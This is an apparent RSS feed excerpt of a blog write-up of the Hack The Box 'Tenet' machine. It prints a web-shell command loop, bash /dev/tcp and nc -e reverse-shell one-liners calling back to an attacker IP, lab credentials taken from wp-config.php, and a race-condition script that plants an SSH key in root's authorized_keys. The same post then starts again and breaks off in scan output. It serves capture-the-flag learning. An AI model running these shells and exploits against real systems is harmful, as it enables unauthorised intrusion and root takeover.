&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;while&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	command &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; input(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	&lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; command &lt;span style=&#34;color:#f92672&#34;&gt;==&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;exit&amp;#39;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;		&lt;span style=&#34;color:#66d9ef&#34;&gt;break&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	&lt;span style=&#34;color:#66d9ef&#34;&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;		r &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; requests&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;get(URI&lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;?c=&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; command)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;		print(r&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It&amp;rsquo;s fairly simple in nature but it does give a way to send and receive commands a terminal like interface. Now that that is ready to go, it&amp;rsquo;s time to get a proper reverse shell.&lt;/p&gt;
&lt;p&gt;The old fallback of &lt;code&gt;basn -c &#39;bash -i &amp;gt;&amp;amp;/dev/tcp/&amp;lt;ip&amp;gt;/&amp;lt;port&amp;gt; 0&amp;gt;&amp;amp;1&#39;&lt;/code&gt; fails along with a similar one using netcat &lt;code&gt;nc -e /bin/sh &amp;lt;ip&amp;gt; &amp;lt;port&amp;gt;&lt;/code&gt;. There is more than one way to send this payload though.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;basn -c &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;bash -i &amp;gt;&amp;amp;/dev/tcp/10.10.14.36/5678 0&amp;gt;&amp;amp;1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This file is created and saved, a python HTTP server is started in the same directory, and a netcat listener on port 5678. Then we go back to back to our &amp;ldquo;terminal&amp;rdquo; access for Tenet, wget the file, mark it as executable and run it. Right away the netcat listener get&amp;rsquo;s a connection.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-properreverseshellsteps.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;user&#34;&gt;User&lt;/h2&gt;
&lt;p&gt;The CWD is wordpress home directory. Listing the files shows the &lt;code&gt;wp-config.php&lt;/code&gt;  file. Inside are credentials configured for interacting with the MySQL database. &lt;code&gt;neil:Opera2112&lt;/code&gt;. Neil used the same password for their login allowing SSH access directory to the box.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-wp-configphp.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;root&#34;&gt;Root&lt;/h2&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-neilsudopermissions.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Via &lt;code&gt;sudo -l&lt;/code&gt; Niel&amp;rsquo;s sudo permissions can be checked. It turns it out they can run a script called&lt;code&gt;EnableSSH.sh&lt;/code&gt; with root permissions.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;neil@tenet:~$ cat /usr/local/bin/enableSSH.sh
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/bin/bash&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;checkAdded&lt;span style=&#34;color:#f92672&#34;&gt;()&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        sshName&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;$(&lt;/span&gt;/bin/echo $key | /usr/bin/cut -d &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; &amp;#34;&lt;/span&gt; -f 3&lt;span style=&#34;color:#66d9ef&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; ! -z &lt;span style=&#34;color:#66d9ef&#34;&gt;$(&lt;/span&gt;/bin/grep $sshName /root/.ssh/authorized_keys&lt;span style=&#34;color:#66d9ef&#34;&gt;)&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                /bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Successfully added &lt;/span&gt;$sshName&lt;span style=&#34;color:#e6db74&#34;&gt; to authorized_keys file!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;else&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                /bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Error in adding &lt;/span&gt;$sshName&lt;span style=&#34;color:#e6db74&#34;&gt; to authorized_keys file!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;checkFile&lt;span style=&#34;color:#f92672&#34;&gt;()&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; ! -s $1 &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;||&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; ! -f $1 &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                /bin/echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Error in creating key file!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[[&lt;/span&gt; -f $1 &lt;span style=&#34;color:#f92672&#34;&gt;]]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt; /bin/rm $1; &lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                exit &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;addKey&lt;span style=&#34;color:#f92672&#34;&gt;()&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        tmpName&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;$(&lt;/span&gt;mktemp -u /tmp/ssh-XXXXXXXX&lt;span style=&#34;color:#66d9ef&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;umask 110; touch $tmpName&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        /bin/echo $key &amp;gt;&amp;gt;$tmpName
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        checkFile $tmpName
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        /bin/cat $tmpName &amp;gt;&amp;gt;/root/.ssh/authorized_keys
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        /bin/rm $tmpName
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;key&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;addKey
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;checkAdded
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The script is fairly simple in nature. First, it creates a temp file in &lt;code&gt;/tmp&lt;/code&gt; and then it echos the root public root SSH key. Then it adds that file to the &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt; file and checks to make sure the key was added successfully.&lt;/p&gt;
&lt;p&gt;This creates a race conidion. If that file is overwritten by a diffrent SSH key before it is added to &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt;, it would grant SSH access as the root user.&lt;/p&gt;
&lt;p&gt;A simple bash can be used to check to check if the temp file has been created. If it has, it will be overwritten with a key key of our choosing. Place all this in a while loop and start it running.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;while&lt;/span&gt; true; &lt;span style=&#34;color:#66d9ef&#34;&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Checking for temp file...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;$(&lt;/span&gt; ls /tmp/ssh-* 2&amp;gt;/dev/null &lt;span style=&#34;color:#66d9ef&#34;&gt;)&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;; &lt;span style=&#34;color:#66d9ef&#34;&gt;then&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC6+U/U+EtFlAU/0QuXeMehQgipru8HqD+TOoGMoM8pON+Brgvr0ThHzSq14wSC6F8yZsHbHYgb7gVutcNsADD+mkl+aZn97385WgWxwYZdW6a8VRLCRFr9nLZhwGeBEJC33+GbKyn3P5flagzgdTlhSBeNxuIh1ahxhnunpEQO7x+J8vyP1ZzYbU2ukApurzkMbV3osD7ovKIKxHc9zbPLOT/907tpz0bT4K3PLsh2FTNjK7xhTNWbqO975+x0d/Ni3UIcmyEb6APTz2ipxqWELpw041Fj6uxzq9pRWLuMypV9vCP9smybu22yEClb4t4J3r63qFl+hpzEwcO8JS7gdhUI9oB7VxyrcjLM4/5MPCnW0faulAUnpspWMsaqun2OjJ1tQMtVJKT3WkUT/We6CPx6YigxnQgV6nUHW3qZ3ZCgvHRot8IRpCYA/fImMcWhuseX5dWGHOJtL641h43xI8AZPQylNkPepCzEa5vQ/b+tKaG7cWxjVD4jbgg4ZRk= root@ubuntu&amp;#34;&lt;/span&gt; &amp;gt; /tmp/ssh-*
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;File found and overwritten&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                exit
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        echo &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;File not found. Continuing.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;EnableSSH.sh&lt;/code&gt; can then be run from another session. The Overwrite script reports it found and overwrote a file and &lt;code&gt;EnableSSH.sh&lt;/code&gt; tells us the key was added successfully.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-fileoverwritten.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;The private key matching the public key used in the script can then be used to SSH to Tenet with root permissions.&lt;/p&gt;
&lt;h2 id=&#34;wrap-up&#34;&gt;Wrap Up&lt;/h2&gt;
&lt;p&gt;Thanks &lt;a href=&#34;https://app.hackthebox.eu/users/94858&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;egotisticalSW&lt;/a&gt;
 for making this machine! I overall had a ton of fun. There was some difficulty on the root privesc. It took two days of attempting to finally get it working and switching to VIP+ servers. I think the challenge was I kept running into other people working on it at the same time and our scripts were clashing. I could see that getting very frustrating.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>HTB Tenet</title>
      <link>http://0xnightwolf.github.io/posts/tenet-writeup/</link>
      <pubDate>Tue, 22 Jun 2021 00:00:00 +0000</pubDate>
      
      <guid>http://0xnightwolf.github.io/posts/tenet-writeup/</guid>
      <description>&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-logo.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Tenet starts off with a wordpress site. After some enumeration second domain is found and a PHP file vulnerable to object injection. From there, an attacker can get a shell, find credentials in a configuration file, and privesc to root by leveraging a race condition.&lt;/p&gt;
&lt;h2 id=&#34;enumeration&#34;&gt;Enumeration&lt;/h2&gt;
&lt;p&gt;NMAP shows port 22 is open for SSH and port 80 is running an HTTP server displaying the default apache2 page.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.91 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2021-01-17 00:47 UTC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.10.10.223
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.15s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;998&lt;/span&gt; closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT   STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Ubuntu Linux; protocol 2.0&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;2048&lt;/span&gt; cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;RSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ECDSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ED25519&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;80/tcp open  http    Apache httpd 2.4.29 &lt;span style=&#34;color:#f92672&#34;&gt;((&lt;/span&gt;Ubuntu&lt;span style=&#34;color:#f92672&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-server-header: Apache/2.4.29 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Ubuntu&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-title: Apache2 Ubuntu Default Page: It works
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 14.61 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The default page doesn&amp;rsquo;t give us a whole lot of info and there doesn&amp;rsquo;t seem to be a robots.txt. FFUF or another directory brute forcer  can be used to learn there is a wordpress directory.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;ffuf -u http://10.10.10.223/FUZZ -w /opt/dirbuster-wordlists/directory-list-2.3-medium.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        /&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;___\  /&amp;#39;&lt;/span&gt;___&lt;span style=&#34;color:#ae81ff&#34;&gt;\ &lt;/span&gt;          /&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&amp;#39;&lt;/span&gt;___&lt;span style=&#34;color:#ae81ff&#34;&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;&lt;/span&gt;       /&lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_&lt;/span&gt;_/ /&lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_&lt;/span&gt;_/  __  __  /&lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_&lt;/span&gt;_/
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;       &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \ &lt;/span&gt;,__&lt;span style=&#34;color:#ae81ff&#34;&gt;\\&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;\ &lt;/span&gt;,__&lt;span style=&#34;color:#ae81ff&#34;&gt;\/\ \/\ \ \ \ &lt;/span&gt;,__&lt;span style=&#34;color:#ae81ff&#34;&gt;\
